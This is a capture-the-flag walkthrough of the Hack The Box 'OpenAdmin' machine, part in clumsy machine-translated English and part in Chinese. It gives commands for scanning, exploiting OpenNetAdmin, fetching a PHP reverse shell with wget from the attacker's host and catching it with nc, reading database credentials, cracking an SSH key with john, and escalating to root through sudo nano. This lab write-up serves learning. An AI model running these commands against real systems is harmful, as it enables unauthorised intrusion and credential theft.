Article Directory
Brief introduction
This is the first attempt to sprout new penetration testing, middle and take a lot of detours, check a lot of information, but learned a lot. Interested students we can discuss together.
initial preparation work
1. Change the / etc / hosts. Adding a line to resolve the address (the last line in FIG.), Convenience only, after all, not as often lost IP host name of the input convenience.
2. Using nmap port scan. nmap -A openadmin
22 and 80 open the server port. It may be in breach of the 80 ports.
View Web pages
1. Open a browser to view http: // openadmin /, we did not find anything special. Use dirbscan Web directory. Command: dirb http://openadmin/
Last scanning has two subdirectories artworkand music. Respectively in the browser open and found artworknothing particularly evident. But in musicthe heads and found the upper right corner login page has a button to jump.
Click to jump into the http://openadmin/ona
top right corner of the administrator login account, just try the next account number adminand password admin, even a successful login. After a period of time to explore this administrator account found nothing special, give up this road.
2. break opennetadmin. Find the page titled opennetadmin, kali run in searchsploit opennetadmin
exactly the same opennetadmin vulnerability and drone version number.
Msf cracking tools can be found there and sh two versions. Msf has been tried before but prompt " no session created." After using sh version, run the command searchsploit -m 47691to download the sh file to the current directory.
look at this cat sh file, found only one parameter
description in conjunction msf before the break, guess this parameter should be http://openadmin/ona/login.php(this sh file to run will get an error, but the copy and paste the code re like, for unknown reasons, have to understand the big brother in trouble prompt). The re-paste the code into the new sh file 1.sh, run the command ./1.sh http://openadmin/ona/login.php
to get a shell. pwdView the current path /opt/ona/www, whoamiview the current user www-data.
Users get jimmy
1.因为之前特意看过opennetadmin官方帮助文档,所以清楚里面会设置数据库账号和密码。但是当下先上传个木马,来个反向shell。
php反向shell帮助文档。
下载好后,按照文档给的提示,在php文件中将ip和端口改成自己的(文件名我改成了p.php,端口设置为6666)。运行python3 -m http.server 80,在靶机的shell中运行wget http://10.10.14.32/p.php.
如图已成功上传,开启本机监听端口,nc -v -n -l -p 6666.并在浏览器访问http://openadmin/ona/p.php。若本机显示如下表示反向shell成功。
2.寻找数据库账号和密码,在/opt/ona/www/local/config/目下有个databases_settings.inc.php。cat一下。
拿到了MySQL用户为ona_sys的密码,使用这个密码尝试登陆jimmy用户和joanna用户,jimmy登陆成功!(之后发现在/etc/apache2/sites-available/openadmin.conf里有相关提示)使用ssh登陆jimmy。
获取joanna用户
1.进入jimmy家目录下并没有user.txt文件,那么只有在joanna下了。继续收集信息。在/var/www下发现以jimmy为所有者的文件夹。
cd internal
ls -l
其中main.php有重要信息
输出joanna用户的ssh密钥,下面的Don forget your “ninja” passwrod的提醒也很醒目,猜想可能是ssh密钥的密码。但是很显然在浏览器无法访问这个文件,文件名为internal,内部?内网?而且这个文件所有者是jimmy理论上无法得到joanna家目下的信息。
2.在这一步卡了许久,最后在/etc/apache2/sites-available/下发现了突破口。
打开internal.conf
当看到中间的AssignUserID joanna joanna明白了,应该是“借用”了joanna用户的权限执行那个php文件。访问端口为52846,浏览器打开访问之连接失败,nmap -p52846 openadmin端口关闭。这时又想起internal这个单词,谨慎的在靶机命令行输入curl http://127.0.0.1:52846/main.php
成功。
这里可以将main.php里的shell代码改成“cat /home/joanna/user.txt”可以直接输出flag。但是不拿到joanna用户无法获取root。
3.将密钥复制到本机上,之前提示的“ninja”应该是密钥密码。使用密钥登录ssh:
ssh -i ssh.txt -l joanna openadmin
输入“ninja”,错误?再输一遍还是错误。
那就只能破解密钥。
先转成john格式,再使用字典爆破。
python /usr/share/john/ssh2john.py ssh.txt > sshjohn
john --wordlist=/usr/share/wordlists/rockyou.txt sshjohn
得到密码“bloodninjas”(这提示跟没给一样…)
继续登录
ssh -i ssh.txt -l joanna openadmin
输入“bloodninjas”进去了,拿到一个flag。
获取root
1. Because a lot of people see this drone that is very simple to get root, so that the flag should not get root complex in Hackthebox. sudo? cowroot? Or what
2 sudo -l
can output information, instructions can be executed joanna sudo, most row, joanna user can not run the two files with a password sudo. (funny)
sudo /bin/nano /opt/priv
Ctrl + R to read the file, input /root/root.txt
the transport, the root of the flag on access to.
